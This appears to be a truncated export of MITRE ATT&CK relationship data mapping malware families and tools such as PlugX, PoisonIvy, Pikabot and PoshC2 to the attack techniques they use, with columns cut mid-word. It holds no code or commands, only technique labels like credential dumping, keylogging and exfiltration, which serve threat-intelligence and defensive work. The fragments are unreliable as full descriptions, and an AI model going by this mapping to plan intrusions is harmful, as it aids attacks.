S0196 PUNCHBUGmalware-- software uses T1087.001Local Acco attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1074.001Local Data attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1036.005Match Legiattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1027 Obfuscatedattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1059.001PowerShellattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1059.006Python attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1547.001Registry Ruattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1218.011Rundll32 attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1518.001Security S attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1129 Shared Moattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1082 System Inf attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1071.001Web Protocattack-pat technique [PUNCHBUGG
S0197 PUNCHTRAmalware-- software uses T1005 Data from attack-pat technique [PUNCHTRAC
S0197 PUNCHTRAmalware-- software uses T1074.001Local Data attack-pat technique [PUNCHTRAC
S0197 PUNCHTRAmalware-- software uses T1027 Obfuscatedattack-pat technique [PUNCHTRAC
S1091 Pacu tool--1b3bsoftware uses T1098.001Additional attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1119 Automatedattack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1059.009Cloud API attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1087.004Cloud Accoattack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1078.004Cloud Accoattack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1651 Cloud Admattack-pat technique [Pacu](htt
S1091 Pacu tool--1b3bsoftware uses T1069.003Cloud Grouattack-pat technique [Pacu](htt
S1091 Pacu tool--1b3bsoftware uses T1580 Cloud Infraattack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1555.006Cloud Secrattack-pat technique [Pacu](htt
S1091 Pacu tool--1b3bsoftware uses T1526 Cloud Servattack-pat technique [Pacu](htt
S1091 Pacu tool--1b3bsoftware uses T1619 Cloud Stor attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1578.001Create Snaattack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1530 Data from attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1562.007Disable or attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1562.008Disable or attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1546 Event Trig attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1654 Log Enumerattack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1518.001Security S attack-pat technique [Pacu](htt
S1091 Pacu tool--1b3bsoftware uses T1648 Serverless attack-pat technique [Pacu](http
S1091 Pacu tool--1b3bsoftware uses T1049 System Netattack-pat technique Once inside
S1091 Pacu tool--1b3bsoftware uses T1552 Unsecuredattack-pat technique [Pacu](http
S0664 Pandora malware-- software uses T1553.006Code Signinattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1574.002DLL Side-L attack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1068 Exploitatioattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1105 Ingress Tooattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1112 Modify Regattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1027 Obfuscatedattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1057 Process Di attack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1055 Process Injattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1569.002Service Ex attack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1573.001Symmetric attack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1205 Traffic Signattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1071.001Web Protocattack-pat technique [Pandora](h
S0664 Pandora malware-- software uses T1543.003Windows Se attack-pat technique [Pandora](h
S0208 Pasam malware--esoftware uses T1005 Data from attack-pat technique [Pasam](ht
S0208 Pasam malware--esoftware uses T1070.004File Deleti attack-pat technique [Pasam](ht
S0208 Pasam malware--esoftware uses T1083 File and Di attack-pat technique [Pasam](htt
S0208 Pasam malware--esoftware uses T1105 Ingress Tooattack-pat technique [Pasam](ht
S0208 Pasam malware--esoftware uses T1547.008LSASS Driv attack-pat technique [Pasam](ht
S0208 Pasam malware--esoftware uses T1057 Process Di attack-pat technique [Pasam](ht
S0208 Pasam malware--esoftware uses T1082 System Inf attack-pat technique [Pasam](ht
S0122 Pass-The-Htool--a52e software uses T1550.002Pass the H attack-pat technique [Pass-The-H
S0556 Pay2Key malware-- software uses T1573.002Asymmetricattack-pat technique [Pay2Key](
S0556 Pay2Key malware-- software uses T1486 Data Encryattack-pat technique [Pay2Key](h
S0556 Pay2Key malware-- software uses T1070.004File Deleti attack-pat technique [Pay2Key](h
S0556 Pay2Key malware-- software uses T1090.001Internal Prattack-pat technique [Pay2Key](
S0556 Pay2Key malware-- software uses T1095 Non-Applicattack-pat technique [Pay2Key](h
S0556 Pay2Key malware-- software uses T1489 Service Stoattack-pat technique [Pay2Key](h
S0556 Pay2Key malware-- software uses T1082 System Inf attack-pat technique [Pay2Key](
S0556 Pay2Key malware-- software uses T1016 System Netattack-pat technique [Pay2Key](
S1050 PcShare tool--3a5 software uses T1546.015Componentattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1005 Data from attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1140 Deobfuscatattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1027.013Encrypted/attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1041 Exfiltratio attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1070.004File Deleti attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1036.001Invalid Codattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1056.001Keyloggingattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1036.005Match Legiattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1112 Modify Regattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1106 Native API attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1057 Process Di attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1055 Process Injattack-pat technique The [PcSha
S1050 PcShare tool--3a5 software uses T1012 Query Regiattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1218.011Rundll32 attack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1113 Screen Capattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1016 System Netattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1125 Video Captattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1071.001Web Protocattack-pat technique [PcShare](
S1050 PcShare tool--3a5 software uses T1059.003Windows Cattack-pat technique [PcShare](
S1102 Pcexter malware--esoftware uses T1574.002DLL Side-L attack-pat technique [Pcexter](h
S1102 Pcexter malware--esoftware uses T1005 Data from attack-pat technique [Pcexter](h
S1102 Pcexter malware--esoftware uses T1567.002Exfiltratio attack-pat technique [Pcexter](h
S1102 Pcexter malware--esoftware uses T1083 File and Di attack-pat technique [Pcexter](h
S0683 Peirates tool--79d software uses T1550.001Applicatio attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1078.004Cloud Accoattack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1552.005Cloud Inst attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1619 Cloud Stor attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1552.007Container attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1609 Container attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1613 Container attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1530 Data from attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1610 Deploy Conattack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1611 Escape to attack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1046 Network Seattack-pat technique [Peirates](
S0683 Peirates tool--79d software uses T1528 Steal Appliattack-pat technique [Peirates](
S0587 Penquin malware-- software uses T1573.002Asymmetricattack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1053.003Cron attack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1027.013Encrypted/attack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1041 Exfiltratio attack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1070.004File Deleti attack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1083 File and Di attack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1027.005Indicator attack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1105 Ingress Tooattack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1222.002Linux and M attack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1036.005Match Legiattack-pat technique [Penquin](
S0587 Penquin malware-- software uses T1040 Network Snattack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1095 Non-Applicattack-pat technique The [Penqu
S0587 Penquin malware-- software uses T1205.002Socket Filt attack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1082 System Inf attack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1016 System Netattack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1205 Traffic Signattack-pat technique [Penquin](h
S0587 Penquin malware-- software uses T1059.004Unix Shell attack-pat technique [Penquin](
S0643 Peppy malware-- software uses T1020 Automatedattack-pat technique [Peppy](htt
S0643 Peppy malware-- software uses T1083 File and Di attack-pat technique [Peppy](htt
S0643 Peppy malware-- software uses T1105 Ingress Tooattack-pat technique [Peppy](ht
S0643 Peppy malware-- software uses T1056.001Keyloggingattack-pat technique [Peppy](ht
S0643 Peppy malware-- software uses T1113 Screen Capattack-pat technique [Peppy](ht
S0643 Peppy malware-- software uses T1071.001Web Protocattack-pat technique [Peppy](ht
S0643 Peppy malware-- software uses T1059.003Windows Cattack-pat technique [Peppy](htt
S1145 Pikabot malware--0software uses T1622 Debugger Eattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1140 Deobfuscatattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1482 Domain Truattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1027.009Embeddedattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1480.001Environmen attack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1041 Exfiltratio attack-pat technique During the
S1145 Pikabot malware--0software uses T1027.011Fileless St attack-pat technique Some versio
S1145 Pikabot malware--0software uses T1087.001Local Acco attack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1106 Native API attack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1571 Non-Standaattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1055.002Portable Exattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1620 Reflective attack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1547.001Registry Ruattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1132.001Standard Eattack-pat technique [Pikabot](
S1145 Pikabot malware--0software uses T1027.003Steganogr attack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1573.001Symmetric attack-pat technique Earlier [Pi
S1145 Pikabot malware--0software uses T1497.001System Cheattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1082 System Inf attack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1016 System Netattack-pat technique [Pikabot](
S1145 Pikabot malware--0software uses T1055.003Thread Exeattack-pat technique [Pikabot](h
S1145 Pikabot malware--0software uses T1059.003Windows Cattack-pat technique [Pikabot](
S0517 Pillowmintmalware-- software uses T1546.011Applicatio attack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1560 Archive Coattack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1055.004Asynchronoattack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1070.009Clear Persiattack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1005 Data from attack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1140 Deobfuscatattack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1070.004File Deleti attack-pat technique [Pillowmin
S0517 Pillowmintmalware-- software uses T1027.011Fileless St attack-pat technique [Pillowmin
S0517 Pillowmintmalware-- software uses T1112 Modify Regattack-pat technique [Pillowmin
S0517 Pillowmintmalware-- software uses T1106 Native API attack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1027 Obfuscatedattack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1059.001PowerShellattack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1057 Process Di attack-pat technique [Pillowmint
S0517 Pillowmintmalware-- software uses T1012 Query Regiattack-pat technique [Pillowmin
S0048 PinchDukemalware-- software uses T1555 Credential attack-pat technique [PinchDuke]
S0048 PinchDukemalware-- software uses T1555.003Credential attack-pat technique [PinchDuke]
S0048 PinchDukemalware-- software uses T1005 Data from attack-pat technique [PinchDuke]
S0048 PinchDukemalware-- software uses T1083 File and Di attack-pat technique [PinchDuke]
S0048 PinchDukemalware-- software uses T1003 OS Credentattack-pat technique [PinchDuke]
S0048 PinchDukemalware-- software uses T1082 System Inf attack-pat technique [PinchDuke]
S0048 PinchDukemalware-- software uses T1071.001Web Protocattack-pat technique [PinchDuke]
S0097 Ping tool--b77bsoftware uses T1018 Remote Sysattack-pat technique [Ping](http
S1031 PingPull malware-- software uses T1005 Data from attack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1140 Deobfuscatattack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1041 Exfiltratio attack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1083 File and Di attack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1036.004Masquerade attack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1095 Non-Applicattack-pat technique [PingPull]
S1031 PingPull malware-- software uses T1571 Non-Standaattack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1132.001Standard Eattack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1573.001Symmetric attack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1082 System Inf attack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1016 System Netattack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1070.006Timestompattack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1071.001Web Protocattack-pat technique A [PingPull
S1031 PingPull malware-- software uses T1059.003Windows Cattack-pat technique [PingPull](
S1031 PingPull malware-- software uses T1543.003Windows Se attack-pat technique [PingPull](
S0501 PipeMon malware-- software uses T1548.002Bypass Useattack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1553.002Code Signi attack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1134.002Create Proattack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1140 Deobfuscatattack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1055.001Dynamic-linattack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1027.013Encrypted/attack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1008 Fallback C attack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1027.011Fileless St attack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1105 Ingress Tooattack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1036.005Match Legiattack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1112 Modify Regattack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1106 Native API attack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1095 Non-Applicattack-pat technique The [PipeM
S0501 PipeMon malware-- software uses T1134.004Parent PIDattack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1547.012Print Proceattack-pat technique The [PipeM
S0501 PipeMon malware-- software uses T1057 Process Di attack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1518.001Security S attack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1129 Shared Moattack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1573.001Symmetric attack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1082 System Inf attack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1016 System Netattack-pat technique [PipeMon](h
S0501 PipeMon malware-- software uses T1124 System Timattack-pat technique [PipeMon](
S0501 PipeMon malware-- software uses T1543.003Windows Se attack-pat technique [PipeMon](h
S0124 Pisloader malware-- software uses T1071.004DNS attack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1083 File and Di attack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1105 Ingress Tooattack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1027 Obfuscatedattack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1547.001Registry Ruattack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1132.001Standard Eattack-pat technique Responses f
S0124 Pisloader malware-- software uses T1082 System Inf attack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1016 System Netattack-pat technique [Pisloader]
S0124 Pisloader malware-- software uses T1059.003Windows Cattack-pat technique [Pisloader]
S1162 Playcrypt malware-- software uses T1486 Data Encryattack-pat technique [Playcrypt]
S1162 Playcrypt malware-- software uses T1083 File and Di attack-pat technique [Playcrypt]
S1162 Playcrypt malware-- software uses T1490 Inhibit Sy attack-pat technique [Playcrypt]
S0013 PlugX malware--6software uses T1574.001DLL Searchattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1574.002DLL Side-L attack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1071.004DNS attack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1102.001Dead Dropattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1140 Deobfuscatattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1083 File and Di attack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1564.001Hidden Fileattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1105 Ingress Tooattack-pat technique [PlugX](ht
S0013 PlugX malware--6software uses T1056.001Keyloggingattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1127.001MSBuild attack-pat technique A version o
S0013 PlugX malware--6software uses T1036.004Masquerade attack-pat technique In one inst
S0013 PlugX malware--6software uses T1036.005Match Legiattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1112 Modify Regattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1106 Native API attack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1135 Network Shattack-pat technique [PlugX](ht
S0013 PlugX malware--6software uses T1095 Non-Applicattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1027 Obfuscatedattack-pat technique [PlugX](ht
S0013 PlugX malware--6software uses T1057 Process Di attack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1012 Query Regiattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1547.001Registry Ruattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1113 Screen Capattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1573.001Symmetric attack-pat technique [PlugX](ht
S0013 PlugX malware--6software uses T1497.001System Cheattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1049 System Netattack-pat technique [PlugX](ht
S0013 PlugX malware--6software uses T1071.001Web Protocattack-pat technique [PlugX](ht
S0013 PlugX malware--6software uses T1059.003Windows Cattack-pat technique [PlugX](htt
S0013 PlugX malware--6software uses T1543.003Windows Se attack-pat technique [PlugX](htt
S0428 PoetRAT malware-- software uses T1560.001Archive viaattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1573.002Asymmetricattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1119 Automatedattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1027.010Command aOttack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1555.003Credential attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1140 Deobfuscatattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1559.002Dynamic Daattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1048 Exfiltratio attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1041 Exfiltratio attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1048.003Exfiltrati attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1070.004File Deleti attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1071.002File Transf attack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1083 File and Di attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1564.001Hidden Fileattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1105 Ingress Tooattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1056.001Keyloggingattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1003.001LSASS Memattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1059.011Lua attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1204.002Malicious Fattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1112 Modify Regattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1571 Non-Standaattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1027 Obfuscatedattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1057 Process Di attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1059.006Python attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1547.001Registry Ruattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1018 Remote Sysattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1113 Screen Capattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1566.001Spearphishattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1497.001System Cheattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1082 System Inf attack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1033 System Own attack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1125 Video Captattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1059.005Visual Basiattack-pat technique [PoetRAT](h
S0428 PoetRAT malware-- software uses T1071.001Web Protocattack-pat technique [PoetRAT](
S0428 PoetRAT malware-- software uses T1059.003Windows Cattack-pat technique [PoetRAT](
S0012 PoisonIvy malware-- software uses T1547.014Active Set attack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1010 Applicatio attack-pat technique [PoisonIvy
S0012 PoisonIvy malware-- software uses T1005 Data from attack-pat technique [PoisonIvy
S0012 PoisonIvy malware-- software uses T1055.001Dynamic-linattack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1105 Ingress Tooattack-pat technique [PoisonIvy
S0012 PoisonIvy malware-- software uses T1056.001Keyloggingattack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1074.001Local Data attack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1112 Modify Regattack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1480.002Mutual Excattack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1027 Obfuscatedattack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1547.001Registry Ruattack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1014 Rootkit attack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1573.001Symmetric attack-pat technique [PoisonIvy]
S0012 PoisonIvy malware-- software uses T1059.003Windows Cattack-pat technique [PoisonIvy
S0012 PoisonIvy malware-- software uses T1543.003Windows Se attack-pat technique [PoisonIvy]
S0518 PolyglotDumalware-- software uses T1102.001Dead Dropattack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1140 Deobfuscatattack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1027.011Fileless St attack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1105 Ingress Tooattack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1112 Modify Regattack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1106 Native API attack-pat technique [PolyglotD
S0518 PolyglotDumalware-- software uses T1027 Obfuscatedattack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1218.011Rundll32 attack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1027.003Steganogr attack-pat technique [PolyglotDu
S0518 PolyglotDumalware-- software uses T1071.001Web Protocattack-pat technique [PolyglotD
S0453 Pony malware-- software uses T1070.004File Deleti attack-pat technique [Pony](http
S0453 Pony malware-- software uses T1105 Ingress Tooattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1087.001Local Acco attack-pat technique [Pony](htt
S0453 Pony malware-- software uses T1204.002Malicious Fattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1204.001Malicious Lattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1036.005Match Legiattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1106 Native API attack-pat technique [Pony](http
S0453 Pony malware-- software uses T1027 Obfuscatedattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1110.001Password Gattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1566.001Spearphishattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1566.002Spearphishattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1082 System Inf attack-pat technique [Pony](http
S0453 Pony malware-- software uses T1497.003Time Basedattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1071.001Web Protocattack-pat technique [Pony](http
S0453 Pony malware-- software uses T1059.003Windows Cattack-pat technique [Pony](http
S0378 PoshC2 tool--4b57software uses T1134 Access Tokattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1560.001Archive viaattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1119 Automatedattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1110 Brute Forc attack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1548.002Bypass Useattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1134.002Create Proattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1552.001Credentialsattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1555 Credential attack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1087.002Domain Acattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1482 Domain Truattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1068 Exploitatioattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1210 Exploitatioattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1083 File and Di attack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1056.001Keyloggingattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1557.001LLMNR/NBT attack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1003.001LSASS Memattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1087.001Local Acco attack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1069.001Local Grouattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1046 Network Seattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1040 Network Snattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1550.002Pass the H attack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1201 Password Pattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1055 Process Injattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1090 Proxy attack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1569.002Service Ex attack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1082 System Inf attack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1016 System Netattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1049 System Netattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1007 System Serattack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1071.001Web Protocattack-pat technique [PoshC2](ht
S0378 PoshC2 tool--4b57software uses T1047 Windows M attack-pat technique [PoshC2](h
S0378 PoshC2 tool--4b57software uses T1546.003Windows Ma attack-pat technique [PoshC2](ht
S1046 PowGoop malware-- software uses T1574.002DLL Side-L attack-pat technique [PowGoop](
S1046 PowGoop malware-- software uses T1140 Deobfuscatattack-pat technique [PowGoop](
S1046 PowGoop malware-- software uses T1573 Encrypted attack-pat technique [PowGoop](
S1046 PowGoop malware-- software uses T1036 Masqueradattack-pat technique [PowGoop](
